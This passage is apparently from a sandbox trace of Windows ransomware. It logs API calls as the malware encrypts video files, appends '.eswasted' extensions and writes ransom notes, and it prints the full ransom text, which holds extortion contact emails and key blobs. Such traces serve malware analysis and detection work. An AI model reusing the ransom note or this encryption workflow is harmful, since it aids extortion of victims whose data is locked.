48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]c86VgJIRVuUbGdATCgFifXIkVZ2Tkrg62dlqQnMqRiNpgrjja3b+N2L+VmpngH6n\r\nq7jm+zhjrBk+AttxWCx7fIEwqKWXQ9R9KmUNANhGMAH0A2OlDlpHv+Yt5mmK5Wqo\r\nsytPFGEnxJpTRaaeIh714QYSTXHdiTCNJA2KA+R9QOJwmH0cd04ZsypnTq78S7SH\r\ngTdbTWLZeyQtdxefoFLuu0vFa02v/yi429DsotZmUPa3DDGux5TSprNKaubek8AT\r\n+KTto/yu9NneDygwvi/eR5rCoC7NiMJZ1uEWSsMJdeGTcFLf53HtJh2HaCItPA1e\r\n7jLbGcPDhVOuJohXnNBnH7W/QmnVPb4JYlAF+Ybaj9DpT7LNu4iGrkgQfAVmoELe\r\nkzKpCM8NvGvnorsCS7pqdHkvqNMjN86I/fd2PnQOtnfBZpCqPLh3suBl4pyv1a+U\r\nDSD6kgOV7Kv07P3E7M9VvvVJh1qZijCpSiVCa7o/MpwUw/Fz4Ua4dKDXVjBX4ehk\r\nSfroTQNAZlmxb5Z5P6t4HiO5BQbhvvPo57b7zrOnQLUbTqMHrv183BATvagLnAhm\r\n4SUxMzBoAdF5HCQXA/FEFi0CJ2pjjdtz0No4rP3aTthkfX0PY2kFsXjLMqMIp+ZT\r\nKaonBCjptoEbs6OLH0KIJvu1KrkugVgQlFRHqOHfecH=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.674] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.674] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0081.675] SetEndOfFile (hFile=0xfc) returned 1 [0081.677] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.677] CloseHandle (hObject=0xfc) returned 1 [0081.683] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.683] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f2b18 | out: hHeap=0x4a0000) returned 1 [0081.683] _aulldvrm () returned 0x0 [0081.683] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.684] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.684] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.684] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aX0Sm_LnLKjFcSAIcYuE.avi") returned 65 [0081.685] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28c) returned 0x4ef6d0 [0081.685] lstrcpyW (in: lpString1=0x4ef752, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.685] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.685] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.686] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0081.686] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aX0Sm_LnLKjFcSAIcYuE.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ax0sm_lnlkjfcsaicyue.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.687] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.688] SetEndOfFile (hFile=0xfc) returned 1 [0081.688] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.688] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.688] lstrcpyW (in: lpString1=0x4ef752, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.688] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aX0Sm_LnLKjFcSAIcYuE.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ax0sm_lnlkjfcsaicyue.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aX0Sm_LnLKjFcSAIcYuE.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ax0sm_lnlkjfcsaicyue.avi.eswasted")) returned 1 [0081.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aX0Sm_LnLKjFcSAIcYuE.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ax0sm_lnlkjfcsaicyue.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0081.690] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0081.690] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x5c87 [0081.690] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5c87) returned 0x2d0000 [0081.690] CloseHandle (hObject=0x100) returned 1 [0081.719] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0081.719] CloseHandle (hObject=0x118) returned 1 [0081.719] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0081.719] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.720] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0081.720] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.720] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.721] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.721] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.729] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.729] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.729] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.729] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]B+jB1HYjzkQdUmZhIM+tE1rpk847p1n0m39hOes+9m5EiE+VzB0f1nkGHovJJfWt\r\njGP/HJyE2VFak54S23XhCsF6OKWaWSHbDeJ4BC5OwdGdCA7aBjjtN4MIDXmvj2zz\r\nWe0dHqEu0o9b7NDwlzoFPZrDSzUQo0GVy2Zo2/rCTTy9WGuIuCvPc8iLT9DWAIHi\r\nJe5oA7b8/hQZb1yJ4hLDNPLCxVYUmO+Hv9KU0U7FbF+7nB/dnrS8QogVMs8EXS4U\r\nmyHalEDWpDRaEbxdXBOcRVamEVphSYp2cYw0dpcxBjDyp8d8t0noONNtLqUcRNQN\r\nepR52r9kbHESMxqU71cNzCcrHYa7Emx6oL2oTiIbN15MEb67IXPE5+QX/orc16l+\r\n378fpwPPeCrsacU1cFZW7hg4Ut/9HrviSV8yx3cX6sk2FLJQDXEX/T9cEgBJpECi\r\ndMhHy75dDIu5OygI6Z0dn4aC8pI9i0LKOaAu6O44ZrQctqnaLXqSNqtudN35vDtQ\r\n8a9aYsR8yz6ZwYDFL8IKrodcE36OINXeVvz2Rn/9teAnjF79uFLkSNVDDhhoC8CR\r\nHnKV9kpiIpfI3DPkigJfL3MWWZl9YmxvcmTaQKcXImOw35SDhwmHSmPVE9shRxon\r\np9fzJzEjI19xl+Gq3bBkk5+J5tFi9fBbrD7KHUzO/9f=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.729] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.729] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0081.730] SetEndOfFile (hFile=0xfc) returned 1 [0081.797] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.797] CloseHandle (hObject=0xfc) returned 1 [0081.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6d0 | out: hHeap=0x4a0000) returned 1 [0081.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fa648 | out: hHeap=0x4a0000) returned 1 [0081.801] _aulldvrm () returned 0x0 [0081.801] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.802] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.802] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.802] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eAVhLFATfraRZkz.mkv") returned 60 [0081.802] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x282) returned 0x4ef6b8 [0081.802] lstrcpyW (in: lpString1=0x4ef730, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.802] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.802] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.803] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0081.803] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eAVhLFATfraRZkz.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\eavhlfatfrarzkz.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.804] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.805] SetEndOfFile (hFile=0xfc) returned 1 [0081.805] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.805] lstrcpyW (in: lpString1=0x4ef730, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.805] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eAVhLFATfraRZkz.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\eavhlfatfrarzkz.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eAVhLFATfraRZkz.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\eavhlfatfrarzkz.mkv.eswasted")) returned 1 [0081.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\eAVhLFATfraRZkz.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\eavhlfatfrarzkz.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.807] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0081.807] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xc604 [0081.807] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc604) returned 0x2d0000 [0081.807] CloseHandle (hObject=0x110) returned 1 [0081.814] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0081.814] CloseHandle (hObject=0x100) returned 1 [0081.814] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0081.814] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.815] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0081.815] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.815] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.816] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.816] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.875] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.875] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.875] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.875] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]okOOF8cA0IphZOTaDwE/AGYLKKyEMM5Q2/LKLUzmx8K2I26DKWCsX+wjt06lWmV3\r\n+7GVkl4/yTm9RZUmrBxCqZl2ni0DEKPYpHepUI8K7nwqJdjRtNdfiHyuO1wTytlM\r\nSGosnsjzajYM3yDbH2zbTZ1doiY6jm+I1iWIrUsNnyMYAtlIerit51/gWSpFspf+\r\nctG09Yt97baHHpPIz+cYqvOATEz/+Wc2Lfd5u9LNdNl89xMorMNHVmKguC5DcuPu\r\nqcYznK4MNojxwfhA+N8iwnxgA3f/LMjNCIZbgELmK2fiVogs57BJ3j6b6aIxtPv7\r\nYaQ0FJDy5v09J1X9LcO6jCdLEFwBHjZIa6oRVbfmSZ5Rd48Dh5WznS/QDLU0yjSP\r\nXMpp/jn1o2ZcEvqLhscrau3GJnCrHvWV6pQP0C9EpbL9eFzQMmI9AsyjJ+fhj3vn\r\nsM6xs6jf6dN/U+7vW/ViOPbnqtbXkYuM5MK8XYc/eTwaUoZZe6gNpfKFqFQ3+sRT\r\nS4vjJA9RIbBz9PZYEjHpvWQWNNybAdunwoKAUbWRsUolPLfrfDRaApm4GoOLzvoq\r\nXn6nLTcAvYQr/AGKkP+dgIizoOVlFSQWGyUzvg1m6AGa4ftYgtlsw8NFnAfXroQK\r\n3zcTj28k4Sq9CCZXbcS7jZvFnvgjc4R+cz8wfAZJVVJ=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.875] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.875] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0081.875] SetEndOfFile (hFile=0xfc) returned 1 [0081.878] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.878] CloseHandle (hObject=0xfc) returned 1 [0081.880] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6b8 | out: hHeap=0x4a0000) returned 1 [0081.880] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f2da0 | out: hHeap=0x4a0000) returned 1 [0081.880] _aulldvrm () returned 0x0 [0081.880] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.881] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.881] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.882] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FYKTnKXZMEbsFmZw.swf") returned 61 [0081.882] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x284) returned 0x4ef6b8 [0081.882] lstrcpyW (in: lpString1=0x4ef732, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.882] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.882] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.883] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.883] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FYKTnKXZMEbsFmZw.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fyktnkxzmebsfmzw.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.883] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.885] SetEndOfFile (hFile=0xfc) returned 1 [0081.885] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.885] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.885] lstrcpyW (in: lpString1=0x4ef732, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.885] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FYKTnKXZMEbsFmZw.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fyktnkxzmebsfmzw.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FYKTnKXZMEbsFmZw.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fyktnkxzmebsfmzw.swf.eswasted")) returned 1 [0081.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FYKTnKXZMEbsFmZw.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fyktnkxzmebsfmzw.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0081.886] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0081.886] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xf0f6 [0081.886] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf0f6) returned 0x2d0000 [0081.887] CloseHandle (hObject=0x100) returned 1 [0081.891] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0081.891] CloseHandle (hObject=0x110) returned 1 [0081.891] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0081.891] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.892] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0081.892] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.892] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.893] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.893] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.905] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.905] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.905] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.905] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]h2/m03MQaIBvfSdRit4EswqGTvEV51N2sbgfalo6J7hiUBetcUVqoYcG4i9vTTHF\r\nuww+vN8RFvd1VQ7u7l60vOTxPDRlvtNJnCwoTFJ8XUtqM8Y8tA6s0bt6HBFXcsFz\r\nJbK5dlZ/gTK6pK9G7NEaQyxmf18wodtrbZfblgHiDG2NEzCp1rK43e8LvPzvkGAA\r\nVrhLsvfPOWGhT0VjE4aGaTT92q4ax0EKN7PWaEuHXAaImCTyP3zYKBkIfny5Un0y\r\nE6W3/y9PBtK7duDMmqTQKiAlwNKmkKaIz6Ls2dZzLICnULUeKFkPdgv4FnVlodnY\r\nFcyI0ofImz+SiFDwB7AN84+3jUu/VYtA0mknomiBKdWmMbtZ8yZmon4FGL8cudpP\r\nOUibOdz6NDDabCXbFmR5wAWjH0EMCEHNtQhWAjHe8IDJ60Qs8d+FtbmXvOwutEtD\r\nk685zzJBoUAR1MUSRpyKREFNuAn2u1lnwUW5/3CkXQ+SDMITdcOEUoGdwwMxjJKO\r\ny2AAIUnN9uySJrSZQ2/K+JXX0EpUIejfOPeg2WySGoJPMLL1VpzlL3RTl4w8+2LR\r\nk+9SUaAdS5Fh9kqRTRILX4W+UWfnw0L5LzFenvJ/B9xJ3PXn+OrL0N0wxBJiZ44I\r\n9Po4XWOmDPMr3yNjviagE/kqi69it7+iRhdZmgRRpbx=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.905] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.905] WriteFile (in: hFile=0xfc, 